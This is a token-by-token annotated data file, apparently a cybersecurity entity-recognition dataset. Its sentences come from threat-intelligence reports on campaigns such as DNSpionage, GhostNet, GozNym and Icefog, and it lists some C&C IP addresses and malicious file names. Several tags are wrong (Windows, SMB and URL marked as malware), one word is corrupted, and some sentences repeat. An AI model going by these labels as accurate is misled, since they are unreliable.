+FrozenCell B-MAL
+masquerades E-MAL
+as O
+fake O
+updates O
+to O
+chat O
+applications O
+like O
+Facebook S-IDTY
+, O
+WhatsApp S-IDTY
+, O
+Messenger S-IDTY
+, O
+LINE S-IDTY
+, O
+and O
+LoveChat S-IDTY
+. O
+
+For O
+example O
+, O
+the O
+actors O
+behind O
+FrozenCell S-MAL
+used O
+a O
+spoofed O
+app O
+called O
+Tawjihi B-MAL
+2016 E-MAL
+, O
+which O
+Jordanian S-LOC
+or O
+Palestinian S-LOC
+students S-IDTY
+would O
+ordinarily O
+use O
+during O
+their O
+general O
+secondary O
+examination O
+. O
+
+It O
+appears O
+the O
+Desert B-APT
+Falcons E-APT
+sent O
+malicious O
+executables O
+though O
+phishing B-ACT
+campaigns E-ACT
+impersonating O
+individuals O
+associated O
+with O
+the O
+Palestinian S-LOC
+Security O
+Services O
+, O
+the O
+General O
+Directorate O
+of O
+Civil O
+Defence O
+- O
+Ministry O
+of O
+the O
+Interior O
+, O
+and O
+the O
+7th O
+Fateh O
+Conference O
+of O
+the O
+Palestinian B-IDTY
+National I-IDTY
+Liberation I-IDTY
+Front E-IDTY
+( O
+held O
+in O
+late O
+2016 S-TIME
+) O
+. O
+
+The O
+titles O
+and O
+contents O
+of O
+these O
+files O
+suggest O
+that O
+the O
+actor O
+targeted O
+individuals O
+affiliated O
+with O
+these O
+government B-IDTY
+agencies E-IDTY
+and O
+the O
+Fatah B-IDTY
+political I-IDTY
+party E-IDTY
+. O
+
+We O
+believe O
+that O
+this O
+is O
+a O
+new O
+variant O
+of O
+VAMP S-MAL
+, O
+indicating O
+that O
+the O
+threat O
+actors O
+behind O
+APT-C-23 S-APT
+are O
+still O
+active O
+and O
+continuously O
+improving O
+their O
+product O
+. O
+
+VAMP S-MAL
+targeted O
+various O
+types O
+of O
+data O
+from O
+the O
+phones O
+of O
+victims O
+: O
+images O
+, O
+text O
+messages O
+, O
+contacts O
+, O
+and O
+call O
+history O
+, O
+among O
+others O
+. O
+
+Recently O
+, O
+Trend B-SECTEAM
+Micro E-SECTEAM
+researchers O
+came O
+across O
+a O
+new O
+mobile O
+malware O
+family O
+which O
+we O
+have O
+called O
+GnatSpy S-MAL
+. O
+
+On O
+Nov. B-TIME
+27 E-TIME
+, O
+2018 S-TIME
+, O
+Cisco B-SECTEAM
+'s I-SECTEAM
+Talos E-SECTEAM
+research O
+division O
+published O
+a O
+write-up O
+outlining O
+the O
+contours O
+of O
+a O
+sophisticated O
+cyber B-ACT
+espionage I-ACT
+campaign E-ACT
+it O
+dubbed O
+DNSpionage S-ACT
+. O
+
+Talos S-SECTEAM
+said O
+the O
+perpetrators O
+of O
+DNSpionage S-ACT
+were O
+able O
+to O
+steal O
+email S-TOOL
+and O
+other O
+login O
+credentials O
+from O
+a O
+number O
+of O
+government S-IDTY
+and O
+private O
+sector O
+entities O
+in O
+Lebanon O
+and O
+the O
+United O
+Arab O
+Emirates O
+by O
+hijacking O
+the O
+DNS S-PROT
+servers O
+for O
+these O
+targets O
+, O
+so O
+that O
+all O
+email S-ACT
+and O
+virtual B-TOOL
+private I-TOOL
+networking E-TOOL
+( O
+VPN S-TOOL
+) O
+traffic O
+was O
+redirected O
+to O
+an O
+Internet O
+address O
+controlled O
+by O
+the O
+attackers O
+. O
+
+Talos S-SECTEAM
+reported O
+that O
+these O
+DNS B-ACT
+hijacks E-ACT
+also O
+paved O
+the O
+ACT O
+for O
+the O
+attackers O
+to O
+obtain O
+SSL O
+encryption O
+certificates O
+for O
+the O
+targeted O
+domains O
+( O
+webmail.finance.gov.lb S-DOM
+) O
+, O
+which O
+allowed O
+them O
+to O
+decrypt O
+the O
+intercepted O
+email S-TOOL
+and O
+VPN S-TOOL
+credentials O
+and O
+view O
+them O
+in O
+plain O
+text O
+. O
+
+That O
+changed O
+on O
+Jan. B-TIME
+25 E-TIME
+, O
+2019 S-TIME
+, O
+when O
+security B-IDTY
+firm E-IDTY
+CrowdStrike S-SECTEAM
+published O
+a O
+blog O
+post O
+listing O
+virtually O
+every O
+Internet O
+address O
+known O
+to O
+be O
+( O
+ab O
+)used O
+by O
+the O
+espionage B-ACT
+campaign E-ACT
+to O
+date O
+. O
+
+Working O
+backwards O
+from O
+each O
+Internet O
+address O
+, O
+I O
+was O
+able O
+to O
+see O
+that O
+in O
+the O
+last O
+few O
+months O
+of O
+2018 S-TIME
+the O
+hackers O
+behind O
+DNSpionage S-ACT
+succeeded O
+in O
+compromising O
+key O
+components O
+of O
+DNS S-PROT
+infrastructure O
+for O
+more O
+than O
+50 O
+Middle B-LOC
+Eastern E-LOC
+companies S-IDTY
+and O
+government B-IDTY
+agencies E-IDTY
+, O
+including O
+targets O
+in O
+Albania S-LOC
+, O
+Cyprus S-LOC
+, O
+Egypt S-LOC
+, O
+Iraq S-LOC
+, O
+Jordan S-LOC
+, O
+Kuwait S-LOC
+, O
+Lebanon S-LOC
+, O
+Libya S-LOC
+, O
+Saudi S-LOC
+Arabia S-LOC
+and O
+the O
+United B-LOC
+Arab I-LOC
+Emirates E-LOC
+. O
+
+PCH O
+is O
+a O
+nonprofit O
+entity O
+based O
+in O
+northern O
+California O
+that O
+also O
+manages O
+significant O
+amounts O
+of O
+the O
+world O
+'s O
+DNS S-PROT
+infrastructure O
+, O
+particularly O
+the O
+DNS S-PROT
+for O
+more O
+than O
+500 O
+top-level O
+domains O
+and O
+a O
+number O
+of O
+the O
+Middle B-LOC
+East E-LOC
+top-level O
+domains O
+targeted O
+by O
+DNSpionage S-ACT
+. O
+
+This O
+APT O
+group O
+usually O
+carries O
+out O
+target B-ACT
+attacks E-ACT
+against O
+government B-IDTY
+agencies E-IDTY
+to O
+steal O
+sensitive O
+information O
+. O
+
+In O
+addition O
+to O
+spreading O
+malware O
+via O
+spear B-ACT
+fishing I-ACT
+email E-ACT
+with O
+Office B-ACT
+attachment E-ACT
+containing O
+either O
+vulnerability O
+or O
+malicious O
+macro O
+, O
+this O
+group O
+is O
+particularly O
+good O
+at O
+leveraging O
+malicious O
+Android B-MAL
+APKs E-MAL
+in O
+the O
+target B-ACT
+attacks E-ACT
+. O
+
+We O
+named O
+the O
+actor O
+DustSquad S-APT
+and O
+have O
+provided O
+private O
+intelligence O
+reports O
+to O
+our O
+customers O
+on O
+four O
+of O
+their O
+campaigns S-ACT
+involving O
+custom O
+Android S-OS
+and O
+Windows S-MAL
+malware S-MAL
+. O
+
+In O
+this O
+blogpost O
+we O
+cover O
+a O
+malicious O
+program O
+for O
+Windows S-OS
+called O
+Octopus S-MAL
+that O
+mostly O
+targets O
+diplomatic B-IDTY
+entities E-IDTY
+. O
+
+We O
+also O
+started O
+monitoring O
+the O
+malware O
+and O
+, O
+using O
+Kaspersky S-SECTEAM
+Attribution O
+Engine O
+based O
+on O
+similarity O
+algorithms O
+, O
+discovered O
+that O
+Octopus S-MAL
+is O
+related O
+to O
+DustSquad O
+, O
+something O
+we O
+reported O
+in O
+April B-TIME
+2018 E-TIME
+. O
+
+From O
+early O
+2014 S-TIME
+until O
+December B-TIME
+2018 E-TIME
+, O
+ns0.idm.net.lb O
+pointed O
+to O
+194.126.10.18 O
+, O
+which O
+appropriately O
+enough O
+is O
+an O
+Internet O
+address O
+based O
+in O
+Lebanon O
+. O
+
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+products O
+detect O
+the O
+Octopus B-MAL
+Trojan E-MAL
+as O
+Trojan.Win32.Octopus.gen E-MAL
+. O
+
+Political B-IDTY
+entities E-IDTY
+in O
+Central O
+Asia O
+have O
+been O
+targeted O
+throughout O
+2018 S-TIME
+by O
+different O
+actors O
+, O
+including O
+IndigoZebra S-APT
+, O
+Sofacy S-APT
+( O
+with O
+Zebrocy S-MAL
+malware S-MAL
+) O
+and O
+most O
+recently O
+by O
+DustSquad O
+( O
+with O
+Octopus S-MAL
+malware S-MAL
+) O
+. O
+
+El O
+Machete O
+is O
+one O
+of O
+these O
+threats O
+that O
+was O
+first O
+publicly O
+disclosed O
+and O
+named O
+by O
+Kaspersky S-SECTEAM
+here O
+. O
+
+We've O
+found O
+that O
+this O
+group O
+has O
+continued O
+to O
+operate O
+successfully O
+, O
+predominantly O
+in O
+Latin B-LOC
+America E-LOC
+, O
+since O
+2014 S-TIME
+. O
+
+All O
+attackers O
+simply O
+moved O
+to O
+new O
+C2 S-TOOL
+infrastructure O
+, O
+based O
+largely O
+around O
+dynamic B-ACT
+DNS I-ACT
+domains E-ACT
+, O
+in O
+addition O
+to O
+making O
+minimal O
+changes O
+to O
+the O
+malware O
+in O
+order O
+to O
+evade O
+signature-based O
+detection O
+. O
+
+In O
+the O
+case O
+of O
+Octopus S-MAL
+, O
+DustSquad O
+used O
+Delphi O
+as O
+their O
+programming O
+language O
+of O
+choice O
+, O
+which O
+is O
+unusual O
+for O
+such O
+an O
+actor O
+. O
+
+Targets O
+included O
+a O
+wide O
+array O
+of O
+high-profile O
+entities O
+, O
+including O
+intelligence B-IDTY
+services E-IDTY
+, O
+military S-IDTY
+, O
+utility B-IDTY
+providers E-IDTY
+( O
+telecommunications S-IDTY
+and O
+power S-IDTY
+) O
+, O
+embassies S-IDTY
+, O
+and O
+government B-IDTY
+institutions E-IDTY
+. O
+
+Some O
+time O
+ago O
+, O
+a O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+customer O
+in O
+Latin B-LOC
+America E-LOC
+contacted O
+us O
+to O
+say O
+he O
+had O
+visited O
+China S-LOC
+and O
+suspected O
+his O
+machine O
+was O
+infected O
+with O
+an O
+unknown O
+, O
+undetected O
+malware O
+. O
+
+It O
+was O
+a O
+targeted B-ACT
+attack E-ACT
+we O
+are O
+calling O
+" O
+Machete O
+" O
+. O
+
+At O
+first O
+look O
+, O
+it O
+pretends O
+to O
+be O
+a O
+Java B-MAL
+related I-MAL
+application E-MAL
+but O
+after O
+a O
+quick O
+analysis O
+, O
+it O
+was O
+obvious O
+this O
+was O
+something O
+more O
+than O
+just O
+a O
+simple O
+Java B-FILE
+file E-FILE
+. O
+
+" O
+Machete O
+" O
+is O
+a O
+targeted B-ACT
+attack I-ACT
+campaign E-ACT
+with O
+Spanish S-LOC
+speaking O
+roots O
+. O
+
+The O
+decoy B-MAL
+slideshows E-MAL
+all O
+contain O
+photos O
+from O
+very O
+meaningful O
+events O
+to O
+individuals O
+in O
+Thailand S-LOC
+, O
+suggesting O
+that O
+the O
+actors O
+continually O
+look O
+for O
+impactful O
+events O
+to O
+use O
+to O
+disguise O
+their O
+attacks O
+. O
+
+In O
+some O
+cases O
+, O
+such O
+as O
+Russia S-LOC
+, O
+the O
+target O
+appears O
+to O
+be O
+an O
+embassy S-IDTY
+from O
+one O
+of O
+the O
+countries O
+of O
+this O
+list O
+. O
+
+Both O
+attackers O
+and O
+victims O
+speak O
+Spanish S-LOC
+natively O
+, O
+as O
+we O
+see O
+it O
+consistently O
+in O
+the O
+source O
+code O
+of O
+the O
+client O
+side O
+and O
+in O
+the O
+Python S-TOOL
+code O
+. O
+
+We O
+are O
+also O
+grateful O
+to O
+the O
+Private O
+Office O
+of O
+his O
+Holiness O
+the O
+Dalai O
+Lama O
+, O
+the O
+Tibetan O
+Government-in-Exile O
+, O
+the O
+missions O
+of O
+Tibet S-IDTY
+in O
+London O
+, O
+Brussels S-IDTY
+, O
+and O
+New O
+York O
+, O
+and O
+Drewla S-IDTY
+( O
+a O
+Tibetan S-IDTY
+NGO S-IDTY
+) O
+. O
+
+Between O
+June B-TIME
+2008 E-TIME
+and O
+March B-TIME
+2009 E-TIME
+the O
+Information B-TOOL
+Warfare I-TOOL
+Monitor E-TOOL
+conducted O
+an O
+extensive O
+and O
+exhaustive O
+two-phase O
+investigation O
+focused O
+on O
+allegations O
+of O
+Chinese B-LOC
+cyber E-LOC
+espionage O
+against O
+the O
+Tibetan B-IDTY
+community E-IDTY
+. O
+
+These O
+instances O
+of O
+Gh0st B-MAL
+RAT E-MAL
+are O
+consistently O
+controlled O
+from O
+commercial O
+Internet O
+access O
+accounts O
+located O
+on O
+the O
+island B-LOC
+of I-LOC
+Hainan E-LOC
+, O
+People's B-IDTY
+Republic E-IDTY
+of O
+China S-LOC
+. O
+
+The O
+fieldwork O
+generated O
+extensive O
+data O
+that O
+allowed O
+us O
+to O
+examine O
+Tibetan B-IDTY
+information I-IDTY
+security I-IDTY
+practices E-IDTY
+, O
+as O
+well O
+as O
+capture O
+real-time O
+evidence O
+of O
+malware O
+that O
+had O
+penetrated O
+Tibetan S-IDTY
+computer O
+systems O
+. O
+
+It O
+is O
+therefore O
+possible O
+that O
+the O
+large O
+percentage O
+of O
+high O
+value O
+targets O
+identified O
+in O
+our O
+analysis O
+of O
+the O
+GhostNet S-ACT
+are O
+coincidental O
+, O
+spread O
+by O
+contact O
+between O
+individuals O
+who O
+previously O
+communicated O
+through O
+e-mail S-TOOL
+. O
+
+Where O
+they O
+exist O
+, O
+they O
+often O
+use O
+grey B-MAL
+market E-MAL
+or O
+pirated B-MAL
+software E-MAL
+. O
+
+Contextually O
+relevant O
+emails S-TOOL
+are O
+sent O
+to O
+specific O
+targets O
+with O
+attached O
+documents S-FILE
+that O
+are O
+packed O
+with O
+exploit S-VULNAME
+code O
+and O
+Trojan S-MAL
+horse O
+programmes O
+designed O
+to O
+take O
+advantage O
+of O
+vulnerabilities O
+in O
+software O
+installed O
+on O
+the O
+target O
+'s O
+computer O
+. O
+
+GhostNet S-ACT
+represents O
+a O
+network O
+of O
+compromised O
+computers O
+resident O
+in O
+high-value O
+political S-IDTY
+, O
+economic S-IDTY
+, O
+and O
+media S-IDTY
+locations O
+spread O
+across O
+numerous O
+countries O
+worldwide O
+. O
+
+After O
+that O
+, O
+the O
+attacker O
+is O
+capable O
+to O
+control O
+the O
+compromised B-ACT
+device E-ACT
+. O
+
+The O
+computers O
+of O
+diplomats S-IDTY
+, O
+military B-IDTY
+attachés E-IDTY
+, O
+private B-IDTY
+assistants E-IDTY
+, O
+secretaries S-IDTY
+to O
+Prime B-IDTY
+Ministers E-IDTY
+, O
+journalists S-IDTY
+and O
+others O
+are O
+under O
+the O
+concealed O
+control O
+of O
+unknown O
+assailant O
+. O
+
+The O
+C&C S-TOOL
+server O
+( O
+82.137.255.56 S-IP
+) O
+used O
+by O
+the O
+above O
+backdoors O
+was O
+used O
+by O
+APT-C-27 S-APT
+( O
+Goldmouse S-APT
+) O
+many O
+times O
+since O
+2017 O
+. O
+
+According O
+to O
+360 B-SECTEAM
+Threat I-SECTEAM
+Intelligence I-SECTEAM
+Center E-SECTEAM
+, O
+Goldmouse O
+was O
+observed O
+deploying O
+the O
+nebulous O
+njRAT B-MAL
+backdoor E-MAL
+. O
+
+The O
+banking O
+malware O
+GozNym S-MAL
+has O
+legs O
+; O
+only O
+a O
+few O
+weeks O
+after O
+the O
+hybrid O
+Trojan S-MAL
+was O
+discovered O
+, O
+it O
+has O
+reportedly O
+spread O
+into O
+Europe O
+and O
+begun O
+plaguing O
+banking B-IDTY
+customers E-IDTY
+in O
+Poland O
+with O
+redirection B-ACT
+attacks E-ACT
+. O
+
+The O
+APT O
+group O
+is O
+reportedly O
+targeting O
+the O
+Middle B-LOC
+East E-LOC
+region O
+. O
+
+The O
+malware O
+has O
+started O
+targeting O
+corporate O
+, O
+SMB S-MAL
+, O
+investment B-IDTY
+banking E-IDTY
+and O
+consumer O
+accounts O
+at O
+banks S-IDTY
+, O
+including O
+some O
+in O
+Portugal O
+and O
+the O
+U.S. S-LOC
+, O
+in O
+addition O
+to O
+Poland S-LOC
+, O
+according O
+to O
+researchers O
+at O
+IBM B-SECTEAM
+'s I-SECTEAM
+X-Force E-SECTEAM
+team O
+. O
+
+According O
+to O
+Kessem S-SECTEAM
+the O
+malware O
+has O
+redirection O
+instructions O
+for O
+17 O
+banks S-IDTY
+, O
+and O
+features O
+an O
+additional O
+230 O
+URLs O
+to O
+assist O
+attackers O
+in O
+targeting O
+community B-IDTY
+banks E-IDTY
+and O
+email B-IDTY
+service I-IDTY
+providers E-IDTY
+in O
+Poland S-LOC
+. O
+
+With O
+GozNym S-MAL
+, O
+attackers O
+dupe O
+users O
+by O
+showing O
+them O
+the O
+actual O
+bank S-IDTY
+'s O
+URL S-MAL
+and O
+SSL B-MAL
+certificate E-MAL
+. O
+
+Fresh O
+from O
+targeting O
+banks S-IDTY
+in O
+Poland S-LOC
+, O
+the O
+banking S-IDTY
+Trojan S-MAL
+GozNym S-MAL
+has O
+begun O
+taking O
+aim O
+at O
+banks S-IDTY
+in O
+Germany S-LOC
+. O
+
+Attackers O
+went O
+on O
+to O
+use O
+the O
+Trojan S-MAL
+to O
+steal O
+$4 O
+million O
+from O
+24 O
+banks S-IDTY
+, O
+including O
+22 O
+in O
+the O
+United B-LOC
+States E-LOC
+and O
+two O
+in O
+Canada S-LOC
+, O
+in O
+just O
+two O
+weeks O
+. O
+
+Recreating O
+and O
+maintaining O
+fake O
+bank S-IDTY
+sites O
+can O
+be O
+an O
+arduous O
+task O
+, O
+but O
+Kessem S-SECTEAM
+claims O
+the O
+GozNym O
+group O
+appears O
+up O
+to O
+the O
+task O
+. O
+
+The O
+malware O
+is O
+distributed O
+primarily O
+through O
+laced B-ACT
+spam E-ACT
+emails S-TOOL
+that O
+lure O
+recipients O
+into O
+opening O
+attachments O
+. O
+
+Kessem S-SECTEAM
+. O
+
+Fresh O
+from O
+targeting O
+banks S-IDTY
+in O
+Poland S-LOC
+, O
+the O
+banking S-IDTY
+Trojan S-MAL
+has O
+reportedly O
+begun O
+taking O
+aim O
+at O
+banks S-IDTY
+in O
+Germany S-LOC
+. O
+
+Now O
+GozNym S-MAL
+is O
+now O
+targeting O
+13 O
+banks S-IDTY
+and O
+subsidiaries S-IDTY
+in O
+Germany S-LOC
+, O
+Limor O
+Kessem S-SECTEAM
+, O
+Executive B-SECTEAM
+Security E-SECTEAM
+Advisor O
+at O
+IBM S-SECTEAM
+, O
+said O
+Tuesday S-TIME
+. O
+
+he O
+Trojan S-MAL
+, O
+a O
+hybrid O
+of O
+Nymaim S-MAL
+and O
+Gozi S-MAL
+malware S-MAL
+, O
+initially O
+formed O
+in O
+April O
+and O
+thrives O
+on O
+carrying O
+out O
+redirection B-ACT
+attacks E-ACT
+via O
+DNS B-ACT
+poisoning E-ACT
+. O
+
+In O
+April S-TIME
+, O
+shortly O
+after O
+the O
+Trojan S-MAL
+'s O
+discovery O
+, O
+researchers O
+observed O
+a O
+massive O
+GozNym B-ACT
+campaign E-ACT
+targeting O
+24 O
+North B-LOC
+American E-LOC
+banks S-IDTY
+. O
+
+The O
+method O
+, O
+which O
+technically O
+redirects O
+users O
+through O
+local O
+DNS B-ACT
+poisoning E-ACT
+, O
+requires O
+a O
+fair O
+bit O
+of O
+work O
+; O
+recreating O
+and O
+maintaining O
+fake O
+bank S-IDTY
+sites O
+can O
+be O
+an O
+arduous O
+task O
+, O
+but O
+Kessem S-SECTEAM
+claims O
+the O
+group O
+behind O
+GozNym S-MAL
+– O
+Nymaim O
+– O
+appear O
+up O
+to O
+the O
+task O
+. O
+
+Attackers O
+behind O
+Dyre O
+have O
+used O
+similar O
+tactics O
+in O
+the O
+past O
+but O
+have O
+only O
+deployed O
+their O
+attacks O
+in O
+English O
+speaking O
+countries O
+and O
+Spain S-LOC
+. O
+
+When O
+we O
+last O
+heard O
+from O
+the O
+Trojan S-MAL
+, O
+its O
+operators O
+were O
+seen O
+launching O
+redirection B-ACT
+attacks E-ACT
+on O
+four O
+large O
+, O
+U.S. S-LOC
+banks S-IDTY
+in O
+June S-TIME
+. O
+
+The O
+fact O
+that O
+the O
+cybercriminals O
+behind O
+GozNym S-MAL
+have O
+already O
+adapted O
+the O
+Trojan S-MAL
+for O
+three O
+different O
+languages O
+and O
+in O
+countries O
+which O
+have O
+different O
+banking O
+systems O
+is O
+unique O
+, O
+according O
+to O
+Kessem S-SECTEAM
+. O
+
+By O
+the O
+end B-TIME
+of I-TIME
+April E-TIME
+, O
+GozNym S-MAL
+had O
+redirection O
+instructions O
+for O
+17 O
+Polish O
+banks S-IDTY
+in O
+its O
+repertoire O
+, O
+along O
+with O
+an O
+extra O
+230 O
+URLs O
+designed O
+to O
+assist O
+attackers O
+in O
+targeting O
+community B-IDTY
+banks E-IDTY
+and O
+email B-IDTY
+service I-IDTY
+providers E-IDTY
+in O
+the O
+Eastern S-LOC
+European S-LOC
+country O
+. O
+
+Seeking O
+to O
+tease O
+out O
+any O
+possible O
+links O
+between O
+Operation B-ACT
+Aurora E-ACT
+, O
+VOHO S-ACT
+, O
+Operation B-ACT
+DeputyDog E-ACT
+, O
+and O
+Ephemeral B-ACT
+Hydra E-ACT
+, O
+we O
+began O
+with O
+Symantec S-SECTEAM
+'s O
+Hidden O
+Lynx O
+report O
+as O
+our O
+foundation O
+. O
+
+The O
+authors O
+of O
+that O
+report O
+identify O
+three O
+primary O
+tools O
+used O
+in O
+the O
+campaigns S-ACT
+attributed O
+to O
+Hidden O
+Lynx O
+: O
+Trojan.Naid S-MAL
+, O
+Backdoor.Moudoor S-FILE
+, O
+and O
+Backdoor.Hikit S-MAL
+. O
+
+We O
+will O
+detail O
+how O
+the O
+C&C S-TOOL
+infrastructure O
+and O
+tools O
+used O
+by O
+hacker O
+group O
+Hidden B-APT
+Lynx E-APT
+during O
+its O
+VOHO B-ACT
+campaign E-ACT
+( O
+2012 S-TIME
+) O
+, O
+excellently O
+documented O
+by O
+Symantec S-SECTEAM
+researchers O
+last O
+September S-TIME
+, O
+overlap O
+with O
+tools O
+used O
+in O
+other O
+high O
+profile O
+operations O
+during O
+the O
+past O
+few O
+years O
+. O
+
+When O
+the O
+New B-IDTY
+York I-IDTY
+Times E-IDTY
+and O
+Mandiant S-SECTEAM
+last B-TIME
+year E-TIME
+unmasked O
+a O
+large O
+scale O
+Chinese O
+hacking O
+operation O
+, O
+pinpointing O
+its O
+location O
+down O
+to O
+the O
+building O
+, O
+the O
+report O
+drew O
+mainstream O
+attention O
+to O
+what O
+security O
+professionals O
+already O
+well O
+knew O
+: O
+sophisticated O
+threat O
+actors O
+carry O
+out O
+persistent O
+cyber O
+operations O
+over O
+months O
+and O
+years O
+. O
+
+By O
+the O
+end B-TIME
+of I-TIME
+April E-TIME
+, O
+GozNym S-MAL
+had O
+redirection O
+instructions O
+for O
+17 O
+Polish O
+banks S-IDTY
+in O
+its O
+repertoire O
+, O
+along O
+with O
+an O
+extra O
+230 O
+URLs O
+designed O
+to O
+assist O
+attackers O
+in O
+targeting O
+community B-IDTY
+banks E-IDTY
+and O
+email B-IDTY
+service I-IDTY
+providers E-IDTY
+in O
+the O
+Eastern B-LOC
+European E-LOC
+country O
+. O
+
+Using O
+Recorded O
+Future O
+, O
+we O
+quickly O
+built O
+a O
+timeline O
+of O
+the O
+reported O
+use O
+of O
+those O
+tools O
+in O
+major O
+security O
+incidents O
+, O
+finding O
+many O
+events O
+prior O
+to O
+the O
+early O
+2013 S-TIME
+exposé O
+on O
+Hidden B-APT
+Lynx E-APT
+. O
+
+In O
+particular O
+, O
+FireEye S-SECTEAM
+during O
+the O
+fall O
+of O
+2013 S-TIME
+called O
+out O
+infrastructure O
+overlap O
+between O
+Ephemeral O
+Hydra O
+and O
+DeputyDog S-MAL
+. O
+
+The O
+above O
+network O
+shows O
+relationships O
+between O
+three O
+tools O
+used O
+by O
+Hidden O
+Lynx O
+during O
+its O
+VOHO B-ACT
+campaign E-ACT
+: O
+Trojan.Naid S-MAL
+, O
+Backdoor.Moudoor S-FILE
+, O
+and O
+Backdoor.Hikit S-MAL
+. O
+
+Symantec S-SECTEAM
+during O
+2012 S-TIME
+linked O
+the O
+Elderwood B-ACT
+Project E-ACT
+to O
+Operation B-ACT
+Aurora E-ACT
+; O
+Trojan.Naid S-MAL
+and O
+Backdoor.Moudoor S-FILE
+were O
+also O
+used O
+in O
+Aurora S-MAL
+, O
+by O
+the O
+Elderwood B-APT
+Gang E-APT
+, O
+and O
+by O
+Hidden B-APT
+Lynx E-APT
+. O
+
+In O
+addition O
+to O
+these O
+, O
+we O
+also O
+identified O
+" O
+Macfog S-MAL
+" O
+, O
+a O
+native B-MAL
+Mac I-MAL
+OS I-MAL
+X I-MAL
+implementation E-MAL
+of O
+Icefog S-MAL
+that O
+infected O
+several O
+hundred O
+victims O
+worldwide O
+. O
+
+Icefog S-APT
+, O
+also O
+known O
+as O
+the O
+" O
+Dagger B-APT
+Panda E-APT
+" O
+by O
+Crowdstrike S-SECTEAM
+'s O
+naming O
+convention O
+, O
+infected O
+targets O
+mainly O
+in O
+South B-LOC
+Korea E-LOC
+and O
+Japan E-LOC
+. O
+
+In O
+2013 S-TIME
+, O
+a O
+public O
+report O
+reveals O
+a O
+group O
+of O
+actors O
+conducted O
+targeted B-ACT
+attacks E-ACT
+leverage O
+a O
+malware O
+dubbed O
+ICEFOG S-MAL
+against O
+mainly O
+government B-IDTY
+organizations E-IDTY
+and O
+defense B-IDTY
+industry E-IDTY
+of O
+South B-LOC
+Korea E-LOC
+and O
+Japan S-LOC
+. O
+
+Similar O
+to O
+our O
+approach O
+with O
+Symantec S-SECTEAM
+'s O
+report O
+on O
+Hidden O
+Lynx O
+, O
+we O
+used O
+Recorded O
+Future O
+to O
+organize O
+the O
+technical O
+details O
+about O
+the O
+DeputyDog B-ACT
+attacks E-ACT
+to O
+reveal O
+technical O
+information O
+described O
+in O
+the O
+open O
+source O
+reporting O
+across O
+multiple O
+campaigns S-ACT
+. O
+
+With O
+Javafog O
+, O
+we O
+are O
+turning O
+yet O
+another O
+page O
+in O
+the O
+Icefog S-MAL
+story O
+by O
+discovering O
+another O
+generation O
+of O
+backdoors O
+used O
+by O
+the O
+attackers O
+. O
+
+Since O
+January B-TIME
+2013 E-TIME
+, O
+we've O
+been O
+on O
+the O
+lookout O
+for O
+a O
+possible O
+RedOctober S-APT
+comeback O
+. O
+
+One O
+possible O
+hit O
+was O
+triggered O
+when O
+we O
+observed O
+Mevade O
+, O
+an O
+unusual O
+piece O
+of O
+malware O
+that O
+appeared O
+late O
+in O
+2013 S-TIME
+. O
+
+In O
+August B-TIME
+2014 E-TIME
+, O
+some O
+of O
+our O
+users O
+observed O
+targeted B-ACT
+attacks E-ACT
+with O
+a O
+variation O
+of O
+CVE-2012-0158 S-VULID
+and O
+an O
+unusual O
+set O
+of O
+malware O
+. O
+
+It O
+wasn't O
+until O
+August B-TIME
+2014 E-TIME
+that O
+we O
+observed O
+something O
+which O
+made O
+us O
+wonder O
+if O
+RedOctober O
+is O
+back O
+for O
+good O
+. O
+
+The O
+Cloud O
+Atlas O
+implants O
+utilize O
+a O
+rather O
+unusual O
+C&C B-ACT
+mechanism E-ACT
+. O
+
+We O
+named O
+it O
+RedOctober O
+because O
+we O
+started O
+this O
+investigation O
+in O
+October B-TIME
+2012 E-TIME
+, O
+an O
+unusually O
+hot O
+month O
+. O
+
+The O
+attackers O
+upload O
+data O
+to O
+the O
+account O
+, O
+which O
+is O
+downloaded O
+by O
+the O
+implant O
+, O
+decrypted O
+and O
+interpreted O
+. O
+
+Just O
+like O
+with O
+RedOctober S-APT
+, O
+the O
+top O
+target O
+of O
+Cloud O
+Atlas O
+is O
+Russia S-LOC
+, O
+followed O
+closely O
+by O
+Kazakhstan O
+, O
+according O
+to O
+data O
+from O
+the O
+Kaspersky B-SECTEAM
+Security I-SECTEAM
+Network E-SECTEAM
+( O
+KSN S-SECTEAM
+) O
+. O
+
+In O
+May B-TIME
+2015 E-TIME
+, O
+Palo B-SECTEAM
+Alto I-SECTEAM
+Networks I-SECTEAM
+WildFire E-SECTEAM
+detected O
+two O
+e-mails S-TOOL
+carrying O
+malicious O
+documents O
+from O
+a O
+genuine O
+and O
+compromised O
+Israeli O
+Gmail O
+account O
+, O
+sent O
+to O
+an O
+Israeli S-LOC
+industrial B-IDTY
+organization E-IDTY
+. O
+
+One O
+e-mail S-TOOL
+carried O
+a O
+Microsoft B-TOOL
+PowerPoint E-TOOL
+file O
+named O
+" O
+thanks.pps S-FILE
+" O
+( O
+VirusTotal S-TOOL
+) O
+, O
+the O
+other O
+a O
+Microsoft B-TOOL
+Word E-TOOL
+document O
+named O
+" O
+request.docx S-FILE
+" O
+. O
+
+Around O
+the O
+same O
+time O
+, O
+WildFire S-SECTEAM
+also O
+captured O
+an O
+e-mail S-TOOL
+containing O
+a O
+Word S-TOOL
+document O
+( O
+" O
+hello.docx S-FILE
+" O
+) O
+with O
+an O
+identical O
+hash O
+as O
+the O
+earlier O
+Word S-TOOL
+document O
+, O
+this O
+time O
+sent O
+to O
+a O
+U.S. S-LOC
+Government S-IDTY
+recipient O
+. O
+
+attacks O
+using O
+this O
+tool O
+were O
+still O
+active O
+as O
+of O
+April B-TIME
+2016 E-TIME
+. O
+
+Considering O
+the O
+language O
+being O
+used O
+in O
+the O
+malicious O
+code O
+is O
+Arabic O
+, O
+it O
+seems O
+that O
+the O
+attacker O
+is O
+familiar O
+with O
+Arabic O
+language O
+as O
+well O
+. O
+
+The O
+initially-observed O
+" O
+thanks.pps S-FILE
+" O
+example O
+tricks O
+the O
+user O
+into O
+running O
+the O
+embedded O
+file O
+named O
+ins8376.exe S-FILE
+which O
+loads O
+a O
+payload O
+DLL S-TOOL
+named O
+mpro324.dll S-FILE
+. O
+
+In O
+this O
+case O
+, O
+the O
+file O
+used O
+the O
+software O
+name O
+" O
+Cyberlink S-FILE
+" O
+, O
+and O
+a O
+description O
+of O
+" O
+CLMediaLibrary O
+Dynamic B-TOOL
+Link I-TOOL
+Library E-TOOL
+" O
+and O
+listing O
+version O
+4.19.9.98 O
+. O
+
+Unit B-SECTEAM
+42 E-SECTEAM
+published O
+a O
+blog O
+at O
+the O
+beginning O
+of O
+May O
+titled O
+" O
+Prince O
+of O
